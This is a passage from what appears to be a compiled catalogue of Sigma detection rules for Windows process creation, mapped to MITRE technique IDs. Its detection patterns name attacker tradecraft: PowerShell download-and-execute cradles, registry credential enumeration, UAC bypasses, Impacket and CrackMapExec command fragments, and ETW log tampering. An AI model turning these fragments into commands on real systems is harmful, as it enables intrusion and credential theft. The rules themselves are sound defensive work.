- :\Windows\System32\werfault.exe
- :\Windows\SysWOW64\werfault.exe
selection:
ParentImage|endswith: \addinutil.exe
Suspicious NTLM Authentication on the Printer Spooler Service
- source: sigma
- technicques:
- t1212
Description
Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- spoolss
- srvsvc
- /print/pipe/
CommandLine|contains|all:
- C:\windows\system32\davclnt.dll,DavSetCookie
- http
selection_img:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.EXE
UAC Bypass Using DismHost
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
Detection logic
condition: selection
selection:
IntegrityLevel:
- High
- System
ParentImage|contains|all:
- C:\Users\
- \AppData\Local\Temp\
- \DismHost.exe
PowerShell DownloadFile
- source: sigma
- technicques:
- t1059
- t1059.001
- t1104
- t1105
Description
Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- powershell
- .DownloadFile
- System.Net.WebClient
PUA - PingCastle Execution From Potentially Suspicious Parent
- source: sigma
- technicques:
- t1595
Description
Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.
Detection logic
condition: 1 of selection_parent_* and selection_parent_ext and selection_cli
selection_cli:
- Image|endswith: \PingCastle.exe
- OriginalFileName: PingCastle.exe
- Product: Ping Castle
- CommandLine|contains:
- --scanner aclcheck
- --scanner antivirus
- --scanner computerversion
- --scanner foreignusers
- --scanner laps_bitlocker
- --scanner localadmin
- --scanner nullsession
- --scanner nullsession-trust
- --scanner oxidbindings
- --scanner remote
- --scanner share
- --scanner smb
- --scanner smb3querynetwork
- --scanner spooler
- --scanner startup
- --scanner zerologon
- CommandLine|contains: --no-enum-limit
- CommandLine|contains|all:
- --healthcheck
- --level Full
- CommandLine|contains|all:
- --healthcheck
- '--server '
selection_parent_ext:
ParentCommandLine|contains:
- .bat
- .chm
- .cmd
- .hta
- .htm
- .html
- .js
- .lnk
- .ps1
- .vbe
- .vbs
- .wsf
selection_parent_path_1:
ParentCommandLine|contains:
- :\Perflogs\
- :\Temp\
- :\Users\Public\
- :\Windows\Temp\
- \AppData\Local\Temp
- \AppData\Roaming\
- \Temporary Internet
selection_parent_path_2:
- ParentCommandLine|contains|all:
- :\Users\
- \Favorites\
- ParentCommandLine|contains|all:
- :\Users\
- \Favourites\
- ParentCommandLine|contains|all:
- :\Users\
- \Contacts\
Enumeration for Credentials in Registry
- source: sigma
- technicques:
- t1552
- t1552.002
Description
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
Detection logic
condition: reg and hive
hive:
- CommandLine|contains|all:
- '/f '
- HKLM
- CommandLine|contains|all:
- '/f '
- HKCU
- CommandLine|contains: HKCU\Software\SimonTatham\PuTTY\Sessions
reg:
CommandLine|contains|all:
- ' query '
- '/t '
- REG_SZ
- /s
Image|endswith: \reg.exe
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI
- source: sigma
- technicques:
Description
Detects changes to Internet Explorer’s (IE / Windows Internet properties) ZoneMap configuration of the “HTTP” and “HTTPS” protocols to point to the “My Computer” zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- \Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults
- http
- ' 0'
Suspicious Execution From Outlook Temporary Folder
- source: sigma
- technicques:
- t1566
- t1566.001
Description
Detects a suspicious program execution in Outlook temp folder
Detection logic
condition: selection
selection:
Image|contains: \Temporary Internet Files\Content.Outlook\
File Encryption/Decryption Via Gpg4win From Suspicious Locations
- source: sigma
- technicques:
Description
Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: -passphrase
selection_metadata:
- Image|endswith:
- \gpg.exe
- \gpg2.exe
- Product: GNU Privacy Guard (GnuPG)
- Description: "GnuPG\u2019s OpenPGP tool"
selection_paths:
CommandLine|contains:
- :\PerfLogs\
- :\Temp\
- :\Users\Public\
- :\Windows\Temp\
- \AppData\Local\Temp\
- \AppData\Roaming\
Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
Detection logic
condition: all of selection*
selection_cli:
CommandLine|contains|all:
- ' service get '
- name,displayname,pathname,startmode
selection_img:
- OriginalFileName: wmic.exe
- Image|endswith: \WMIC.exe
PUA - CsExec Execution
- source: sigma
- technicques:
- t1569
- t1569.002
- t1587
- t1587.001
Description
Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
Detection logic
condition: 1 of selection*
selection:
Image|endswith: \csexec.exe
selection_pe:
Description: csexec
HackTool - Potential Impacket Lateral Movement Activity
- source: sigma
- technicques:
- t1021
- t1021.003
- t1047
Description
Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
Detection logic
condition: 1 of selection_*
selection_atexec:
CommandLine|contains|all:
- cmd.exe
- /C
- Windows\Temp\
- '&1'
ParentCommandLine|contains:
- svchost.exe -k netsvcs
- taskeng.exe
selection_other:
CommandLine|contains|all:
- cmd.exe
- /Q
- /c
- \\\\127.0.0.1\\
- '&1'
ParentImage|endswith:
- \wmiprvse.exe
- \mmc.exe
- \explorer.exe
- \services.exe
Arbitrary MSI Download Via Devinit.EXE
- source: sigma
- technicques:
- t1218
Description
Detects a certain command line flag combination used by “devinit.exe”, which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- ' -t msi-install '
- ' -i http'
Chromium Browser Headless Execution To Mockbin Like Site
- source: sigma
- technicques:
Description
Detects the execution of a Chromium based browser process with the “headless” flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
Detection logic
condition: all of selection_*
selection_headless:
CommandLine|contains: --headless
selection_img:
Image|endswith:
- \brave.exe
- \chrome.exe
- \msedge.exe
- \opera.exe
- \vivaldi.exe
selection_url:
CommandLine|contains:
- ://run.mocky
- ://mockbin
Enumerate All Information With Whoami.EXE
- source: sigma
- technicques:
- t1033
Description
Detects the execution of “whoami.exe” with the “/all” flag
Detection logic
condition: all of selection_main_*
selection_main_cli:
CommandLine|contains|windash: ' -all'
selection_main_img:
- Image|endswith: \whoami.exe
- OriginalFileName: whoami.exe
Potential Remote Desktop Tunneling
- source: sigma
- technicques:
- t1021
Description
Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
Detection logic
condition: all of selection*
selection:
CommandLine|contains: :3389
selection_opt:
CommandLine|contains:
- ' -L '
- ' -P '
- ' -R '
- ' -pw '
- ' -ssh '
Suspicious PowerShell Invocations - Specific - ProcessCreation
- source: sigma
- technicques:
Description
Detects suspicious PowerShell invocation command parameters
Detection logic
condition: 1 of selection_* and not 1 of filter_*
filter_chocolatey:
CommandLine|contains:
- (New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1
- Write-ChocolateyWarning
selection_convert_b64:
CommandLine|contains|all:
- -nop
- ' -w '
- hidden
- ' -c '
- '[Convert]::FromBase64String'
selection_enc:
CommandLine|contains|all:
- ' -w '
- hidden
- -ep
- bypass
- -Enc
selection_iex:
CommandLine|contains|all:
- ' -w '
- hidden
- -noni
- -nop
- ' -c '
- iex
- New-Object
selection_iex_webclient:
CommandLine|contains|all:
- iex
- New-Object
- Net.WebClient
- .Download
selection_reg:
CommandLine|contains|all:
- powershell
- reg
- add
- \software\
selection_webclient:
CommandLine|contains|all:
- bypass
- -noprofile
- -windowstyle
- hidden
- new-object
- system.net.webclient
- .download
HackTool - Koadic Execution
- source: sigma
- technicques:
- t1059
- t1059.003
- t1059.005
- t1059.007
Description
Detects command line parameters used by Koadic hack tool
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- /q
- /c
- chcp
selection_img:
- Image|endswith: \cmd.exe
- OriginalFileName: Cmd.Exe
Suspicious Regsvr32 Execution From Remote Share
- source: sigma
- technicques:
- t1218
- t1218.010
Description
Detects REGSVR32.exe to execute DLL hosted on remote shares
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' \\\\'
selection_img:
- Image|endswith: \regsvr32.exe
- OriginalFileName: \REGSVR32.EXE
Cscript/Wscript Uncommon Script Extension Execution
- source: sigma
- technicques:
- t1059
- t1059.005
- t1059.007
Description
Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
Detection logic
condition: all of selection_*
selection_extension:
CommandLine|contains:
- .csv
- .dat
- .doc
- .gif
- .jpeg
- .jpg
- .png
- .ppt
- .txt
- .xls
- .xml
selection_img:
- OriginalFileName:
- wscript.exe
- cscript.exe
- Image|endswith:
- \wscript.exe
- \cscript.exe
File Decryption Using Gpg4win
- source: sigma
- technicques:
Description
Detects usage of Gpg4win to decrypt files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- ' -d '
- passphrase
selection_metadata:
- Image|endswith:
- \gpg.exe
- \gpg2.exe
- Description: "GnuPG\u2019s OpenPGP tool"
Execute From Alternate Data Streams
- source: sigma
- technicques:
- t1564
- t1564.004
Description
Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
Detection logic
condition: selection_stream and (1 of selection_tools_*)
selection_stream:
CommandLine|contains: 'txt:'
selection_tools_esentutl:
CommandLine|contains|all:
- 'esentutl '
- ' /y '
- ' /d '
- ' /o '
selection_tools_makecab:
CommandLine|contains|all:
- 'makecab '
- .cab
selection_tools_reg:
CommandLine|contains|all:
- 'reg '
- ' export '
selection_tools_regedit:
CommandLine|contains|all:
- 'regedit '
- ' /E '
selection_tools_type:
CommandLine|contains|all:
- 'type '
- ' > '
DumpMinitool Execution
- source: sigma
- technicques:
- t1003
- t1003.001
- t1036
Description
Detects the use of “DumpMinitool.exe” a tool that allows the dump of process memory via the use of the “MiniDumpWriteDump”
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- ' Full'
- ' Mini'
- ' WithHeap'
selection_img:
- Image|endswith:
- \DumpMinitool.exe
- \DumpMinitool.x86.exe
- \DumpMinitool.arm64.exe
- OriginalFileName:
- DumpMinitool.exe
- DumpMinitool.x86.exe
- DumpMinitool.arm64.exe
SQLite Firefox Profile Data DB Access
- source: sigma
- technicques:
- t1005
- t1539
Description
Detect usage of the “sqlite” binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
Detection logic
condition: all of selection_*
selection_firefox:
CommandLine|contains:
- cookies.sqlite
- places.sqlite
selection_sql:
- Product: SQLite
- Image|endswith:
- \sqlite.exe
- \sqlite3.exe
Uncommon Child Process Of Appvlp.EXE
- source: sigma
- technicques:
- t1218
Description
Detects uncommon child processes of Appvlp.EXE Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse “AppVLP” to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_generic:
Image|endswith:
- :\Windows\SysWOW64\rundll32.exe
- :\Windows\System32\rundll32.exe
filter_optional_office_msoasb:
Image|contains: :\Program Files\Microsoft Office
Image|endswith: \msoasb.exe
filter_optional_office_msouc:
Image|contains: :\Program Files\Microsoft Office
Image|endswith: \MSOUC.EXE
filter_optional_office_skype:
Image|contains|all:
- :\Program Files\Microsoft Office
- \SkypeSrv\
Image|endswith: \SKYPESERVER.EXE
selection:
ParentImage|endswith: \appvlp.exe
InfDefaultInstall.exe .inf Execution
- source: sigma
- technicques:
- t1218
Description
Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- 'InfDefaultInstall.exe '
- '.inf'
HackTool - CrackMapExec Execution
- source: sigma
- technicques:
- t1047
- t1053
- t1059
- t1059.001
- t1059.003
- t1110
- t1201
Description
This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
Detection logic
condition: 1 of selection_* or all of part_localauth*
part_localauth_1:
CommandLine|contains|all:
- ' --local-auth'
- ' -u '
- ' -p '
part_localauth_2:
CommandLine|contains|all:
- ' 10.'
- ' 192.168.'
- '/24 '
selection_binary:
Image|endswith: \crackmapexec.exe
selection_execute:
CommandLine|contains|all:
- ' --local-auth'
- ' -u '
- ' -x '
selection_hash:
CommandLine|contains|all:
- ' --local-auth'
- ' -u '
- ' -p '
- ' -H ''NTHASH'''
selection_module_mssql:
CommandLine|contains|all:
- ' mssql '
- ' -u '
- ' -p '
- ' -M '
- ' -d '
selection_module_smb1:
CommandLine|contains|all:
- ' smb '
- ' -u '
- ' -H '
- ' -M '
- ' -o '
selection_module_smb2:
CommandLine|contains|all:
- ' smb '
- ' -u '
- ' -p '
- ' --local-auth'
selection_special:
CommandLine|contains: ' -M pe_inject '
HackTool - Certify Execution
- source: sigma
- technicques:
- t1649
Description
Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
Detection logic
condition: selection_img or all of selection_cli_*
selection_cli_commands:
CommandLine|contains:
- '.exe cas '
- '.exe find '
- '.exe pkiobjects '
- '.exe request '
- '.exe download '
selection_cli_options:
CommandLine|contains:
- ' /vulnerable'
- ' /template:'
- ' /altname:'
- ' /domain:'
- ' /path:'
- ' /ca:'
selection_img:
- Image|endswith: \Certify.exe
- OriginalFileName: Certify.exe
- Description|contains: Certify
Windows Binary Executed From WSL
- source: sigma
- technicques:
- t1202
Description
Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships
Detection logic
condition: selection
selection:
CurrentDirectory|contains: \\\\wsl.localhost
Image|re: '[a-zA-Z]:\\'
Potential LethalHTA Technique Execution
- source: sigma
- technicques:
- t1218
- t1218.005
Description
Detects potential LethalHTA technique where the “mshta.exe” is spawned by an “svchost.exe” process
Detection logic
condition: selection
selection:
Image|endswith: \mshta.exe
ParentImage|endswith: \svchost.exe
Suspicious Extexport Execution
- source: sigma
- technicques:
- t1218
Description
Extexport.exe loads dll and is execute from other folder the original path
Detection logic
condition: selection
selection:
- CommandLine|contains: Extexport.exe
- Image|endswith: \Extexport.exe
- OriginalFileName: extexport.exe
Lolbin Unregmp2.exe Use As Proxy
- source: sigma
- technicques:
- t1218
Description
Detect usage of the “unregmp2.exe” binary as a proxy to launch a custom version of “wmpnscfg.exe”
Detection logic
condition: all of selection_*
selection_cmd:
CommandLine|contains: ' /HideWMP'
selection_img:
- Image|endswith: \unregmp2.exe
- OriginalFileName: unregmp2.exe
Potential Suspicious Mofcomp Execution
- source: sigma
- technicques:
- t1218
Description
Detects execution of the “mofcomp” utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The “mofcomp” utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts
Detection logic
condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_wmiprvse:
CommandLine|contains: C:\Windows\TEMP\
CommandLine|endswith: .mof
ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
filter_optional_null_parent:
CommandLine|contains: C:\Windows\TEMP\
CommandLine|endswith: .mof
selection_case:
- ParentImage|endswith:
- \cmd.exe
- \powershell.exe
- \pwsh.exe
- \wsl.exe
- \wscript.exe
- \cscript.exe
- CommandLine|contains:
- \AppData\Local\Temp
- \Users\Public\
- \WINDOWS\Temp\
- '%temp%'
- '%tmp%'
- '%appdata%'
selection_img:
- Image|endswith: \mofcomp.exe
- OriginalFileName: mofcomp.exe
SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
- source: sigma
- technicques:
- t1216
- t1218
Description
Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- \SyncAppvPublishingServer.vbs
- ;
Suspicious Invoke-WebRequest Execution With DirectIP
- source: sigma
- technicques:
- t1105
Description
Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
Detection logic
condition: all of selection_*
selection_commands:
CommandLine|contains:
- 'curl '
- Invoke-WebRequest
- 'iwr '
- 'wget '
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
selection_ip:
CommandLine|contains:
- ://1
- ://2
- ://3
- ://4
- ://5
- ://6
- ://7
- ://8
- ://9
Disable of ETW Trace
- source: sigma
- technicques:
- t1070
- t1562
- t1562.006
Description
Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
Detection logic
condition: 1 of selection*
selection_clear_1:
CommandLine|contains|all:
- cl
- /Trace
selection_clear_2:
CommandLine|contains|all:
- clear-log
- /Trace
selection_disable_1:
CommandLine|contains|all:
- sl
- /e:false
selection_disable_2:
CommandLine|contains|all:
- set-log
- /e:false
selection_disable_3:
CommandLine|contains|all:
- logman
- update
- trace
- --p
- -ets
selection_pwsh_remove:
CommandLine|contains: Remove-EtwTraceProvider
selection_pwsh_set:
CommandLine|contains|all:
- Set-EtwTraceProvider
- '0x11'
Suspicious Process Parents
- source: sigma
- technicques:
- t1036
Description
Detects suspicious parent processes that should not have any children or should only have a single possible child program
Detection logic
condition: selection or ( selection_special and not 1 of filter_* )
filter_null:
Image: null
filter_special:
Image|endswith:
- \WerFault.exe
- \wermgr.exe
- \conhost.exe
- \mmc.exe
- \win32calc.exe
- \notepad.exe
selection:
ParentImage|endswith:
- \minesweeper.exe
- \winver.exe
- \bitsadmin.exe
selection_special:
ParentImage|endswith:
- \csrss.exe
- \certutil.exe
- \eventvwr.exe
- \calc.exe
- \notepad.exe
UAC Bypass via Windows Firewall Snap-In Hijack
- source: sigma
- technicques:
- t1548
Description
Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
Detection logic
condition: selection and not filter
filter:
Image|endswith: \WerFault.exe
selection:
ParentCommandLine|contains: WF.msc
ParentImage|endswith: \mmc.exe
Suspicious File Execution From Internet Hosted WebDav Share
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects the execution of the “net use” command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
Detection logic
condition: all of selection_*
selection_base:
CommandLine|contains|all:
- ' net use http'
- '& start /b '
- \DavWWWRoot\
selection_ext:
CommandLine|contains:
- '.exe '
- '.dll '
- '.bat '
- '.vbs '
- '.ps1 '
selection_img:
- Image|contains: \cmd.exe
- OriginalFileName: Cmd.EXE
Suspicious Redirection to Local Admin Share
- source: sigma
- technicques:
- t1048
Description
Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
Detection logic
condition: all of selection_*
selection_redirect:
CommandLine|contains: '>'
selection_share:
CommandLine|contains:
- \\\\127.0.0.1\\admin$\\
- \\\\localhost\\admin$\\
Potential Persistence Via Microsoft Compatibility Appraiser
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Detects manual execution of the “Microsoft Compatibility Appraiser” task via schtasks. In order to trigger persistence stored in the “\AppCompatFlags\TelemetryController” registry key.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- 'run '
- \Application Experience\Microsoft Compatibility Appraiser
selection_img:
- Image|endswith: \schtasks.exe
- OriginalFileName: schtasks.exe
Replace.exe Usage
- source: sigma
- technicques:
- t1105
Description
Detects the use of Replace.exe which can be used to replace file with another file
Detection logic
argument:
CommandLine|contains|windash: -a
condition: selection and argument
selection:
Image|endswith: \replace.exe
Chopper Webshell Process Pattern
- source: sigma
- technicques:
- t1018
- t1033
- t1087
- t1505
- t1505.003
Description
Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
Detection logic
condition: all of selection_*
selection_cmdline:
CommandLine|contains:
- '&ipconfig&echo'
- '&quser&echo'
- '&whoami&echo'
- '&c:&echo'
- '&cd&echo'
- '&dir&echo'
- '&echo [E]'
- '&echo [S]'
selection_origin:
- Image|endswith: \w3wp.exe
- ParentImage|endswith: \w3wp.exe
Possible Privilege Escalation via Weak Service Permissions
- source: sigma
- technicques:
- t1574
- t1574.011
Description
Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
Detection logic
condition: scbynonadmin and 1 of selection_*
scbynonadmin:
Image|endswith: \sc.exe
IntegrityLevel: Medium
selection_binpath:
CommandLine|contains|all:
- config
- binPath
selection_failure:
CommandLine|contains|all:
- failure
- command
Nslookup PowerShell Download Cradle - ProcessCreation
- source: sigma
- technicques:
Description
Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
Detection logic
condition: all of selection_*
selection_cmd:
CommandLine|contains:
- ' -q=txt '
- ' -querytype=txt '
ParentImage|endswith:
- \powershell.exe
- \pwsh.exe
selection_img:
- Image|contains: \nslookup.exe
- OriginalFileName: \nslookup.exe
HackTool - SharpView Execution
- source: sigma
- technicques:
- t1033
- t1049
- t1069
- t1069.002
- t1135
- t1482
Description
Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
Detection logic
condition: selection
selection:
- OriginalFileName: SharpView.exe
- Image|endswith: \SharpView.exe
- CommandLine|contains:
- Add-RemoteConnection
- Convert-ADName
- ConvertFrom-SID
- ConvertFrom-UACValue
- Convert-SidToName
- Export-PowerViewCSV
- Find-DomainObjectPropertyOutlier
- Find-DomainProcess
- Find-DomainShare
- Find-DomainUserEvent
- Find-DomainUserLocation
- Find-ForeignGroup
- Find-ForeignUser
- Find-GPOComputerAdmin
- Find-GPOLocation
- Find-Interesting
- Find-LocalAdminAccess
- Find-ManagedSecurityGroups
- Get-CachedRDPConnection
- Get-DFSshare
- Get-DomainComputer
- Get-DomainController
- Get-DomainDFSShare
- Get-DomainDNSRecord
- Get-DomainFileServer
- Get-DomainForeign
- Get-DomainGPO
- Get-DomainGroup
- Get-DomainGUIDMap
- Get-DomainManagedSecurityGroup
- Get-DomainObject
- Get-DomainOU
- Get-DomainPolicy
- Get-DomainSID
- Get-DomainSite
- Get-DomainSPNTicket
- Get-DomainSubnet
- Get-DomainTrust
- Get-DomainUserEvent
- Get-ForestDomain
- Get-ForestGlobalCatalog
- Get-ForestTrust
- Get-GptTmpl
- Get-GroupsXML
- Get-LastLoggedOn
- Get-LoggedOnLocal
- Get-NetComputer
- Get-NetDomain
- Get-NetFileServer
- Get-NetForest
- Get-NetGPO
- Get-NetGroupMember
- Get-NetLocalGroup
- Get-NetLoggedon
- Get-NetOU
- Get-NetProcess
- Get-NetRDPSession
- Get-NetSession
- Get-NetShare
- Get-NetSite
- Get-NetSubnet
- Get-NetUser
- Get-PathAcl
- Get-PrincipalContext
- Get-RegistryMountedDrive
- Get-RegLoggedOn
- Get-WMIRegCachedRDPConnection
- Get-WMIRegLastLoggedOn
- Get-WMIRegMountedDrive
- Get-WMIRegProxy
- Invoke-ACLScanner
- Invoke-CheckLocalAdminAccess
- Invoke-Kerberoast
- Invoke-MapDomainTrust
- Invoke-RevertToSelf
- Invoke-Sharefinder
- Invoke-UserImpersonation
- Remove-DomainObjectAcl
- Remove-RemoteConnection
- Request-SPNTicket
- Set-DomainObject
- Test-AdminAccess
HackTool - CrackMapExec Execution Patterns
- source: sigma
- technicques:
- t1047
- t1053
- t1059
- t1059.001
- t1059.003
Description
Detects various execution patterns of the CrackMapExec pentesting framework
Detection logic
condition: selection
selection:
CommandLine|contains:
- cmd.exe /Q /c * 1> \\\\*\\*\\* 2>&1
- cmd.exe /C * > \\\\*\\*\\* 2>&1
- cmd.exe /C * > *\\Temp\\* 2>&1
- powershell.exe -exec bypass -noni -nop -w 1 -C "
- 'powershell.exe -noni -nop -w 1 -enc '
Potential Persistence Attempt Via Existing Service Tampering
- source: sigma
- technicques:
- t1543
- t1543.003
- t1574
- t1574.011
Description
Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
Detection logic
condition: selection_sc or all of selection_reg_*
selection_reg_ext:
CommandLine|contains:
- .sh
- .exe
- .dll
- .bin$
- .bat
- .cmd
- .js
- .msh$
- .reg$
- .scr
- .ps
- .vb
- .jar
- .pl
selection_reg_img:
- CommandLine|contains|all:
- 'reg '
- 'add '
- FailureCommand
- CommandLine|contains|all:
- 'reg '
- 'add '
- ImagePath
selection_sc:
- CommandLine|contains|all:
- 'sc '
- 'config '
- binpath=
- CommandLine|contains|all:
- 'sc '
- failure
- command=
Potential Product Class Reconnaissance Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects the execution of WMIC in order to get a list of firewall and antivirus products
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- AntiVirusProduct
- FirewallProduct
selection_img:
- Image|endswith: \wmic.exe
- OriginalFileName: wmic.exe
WSL Child Process Anomaly
- source: sigma
- technicques:
- t1202
- t1218
Description
Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
Detection logic
condition: selection_parent and 1 of selection_children_*
selection_children_images:
Image|endswith:
- \calc.exe
- \cmd.exe
- \cscript.exe
- \mshta.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \rundll32.exe
- \wscript.exe
selection_children_paths:
Image|contains:
- \AppData\Local\Temp\
- C:\Users\Public\
- C:\Windows\Temp\
- C:\Temp\
- \Downloads\
- \Desktop\
selection_parent:
ParentImage|endswith:
- \wsl.exe
- \wslhost.exe
Scheduled Task Executing Payload from Registry
- source: sigma
- technicques:
- t1053
- t1053.005
- t1059
- t1059.001
Description
Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
Detection logic
condition: all of selection_* and not 1 of filter_*
filter_main_encoding:
CommandLine|contains:
- FromBase64String
- encodedcommand
selection_cli_create:
CommandLine|contains: /Create
selection_cli_get:
CommandLine|contains:
- Get-ItemProperty
- ' gp '
selection_cli_hive:
CommandLine|contains:
- 'HKCU:'
- 'HKLM:'
- 'registry::'
- HKEY_
selection_img:
- Image|endswith: \schtasks.exe
- OriginalFileName: schtasks.exe
Invoke-Obfuscation CLIP+ Launcher
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of Clip.exe to execute PowerShell
Detection logic
condition: selection
selection:
CommandLine|contains:
- /c
- /r
CommandLine|contains|all:
- cmd
- '&&'
- 'clipboard]::'
- -f
HackTool - Impersonate Execution
- source: sigma
- technicques:
- t1134
- t1134.001
- t1134.003
Description
Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
Detection logic
condition: all of selection_commandline_* or 1 of selection_hash_*
selection_commandline_exe:
CommandLine|contains: impersonate.exe
selection_commandline_opt:
CommandLine|contains:
- ' list '
- ' exec '
- ' adduser '
selection_hash_ext:
- md5: 9520714AB576B0ED01D1513691377D01
- sha256: E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A
- Imphash: 0A358FFC1697B7A07D0E817AC740DF62
selection_hash_plain:
Hashes|contains:
- MD5=9520714AB576B0ED01D1513691377D01
- SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A
- IMPHASH=0A358FFC1697B7A07D0E817AC740DF62
Windows Hotfix Updates Reconnaissance Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects the execution of wmic with the “qfe” flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
Detection logic
condition: all of selection*
selection_cli:
CommandLine|contains: ' qfe'
selection_img:
- OriginalFileName: wmic.exe
- Image|endswith: \WMIC.exe
UAC Bypass Using Windows Media Player - Process
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Detection logic
condition: 1 of selection*
selection1:
Image: C:\Program Files\Windows Media Player\osk.exe
IntegrityLevel:
- High
- System
selection2:
Image: C:\Windows\System32\cmd.exe
IntegrityLevel:
- High
- System
ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"
/s'
Remote Access Tool - NetSupport Execution From Unusual Location
- source: sigma
- technicques:
Description
Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of ‘C:\Program Files’)
Detection logic
condition: selection and not filter
filter:
Image|startswith:
- C:\Program Files\
- C:\Program Files (x86)\
selection:
- Image|endswith: \client32.exe
- Product|contains: NetSupport Remote Control
- OriginalFileName|contains: client32.exe
- Imphash: a9d50692e95b79723f3e76fcf70d023e
- Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e
CobaltStrike Load by Rundll32
- source: sigma
- technicques:
- t1218
- t1218.011
Description
Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
Detection logic
condition: all of selection*
selection_params:
CommandLine|contains: .dll
CommandLine|endswith:
- ' StartW'
- ',StartW'
selection_rundll:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.EXE
- CommandLine|contains:
- rundll32.exe
- 'rundll32 '
WMI Backdoor Exchange Transport Agent
- source: sigma
- technicques:
- t1546
- t1546.003
Description
Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
Detection logic
condition: selection and not 1 of filter_*
filter_conhost:
Image: C:\Windows\System32\conhost.exe
filter_oleconverter:
Image|endswith: \Bin\OleConverter.exe
Image|startswith: C:\Program Files\Microsoft\Exchange Server\
selection:
ParentImage|endswith: \EdgeTransport.exe
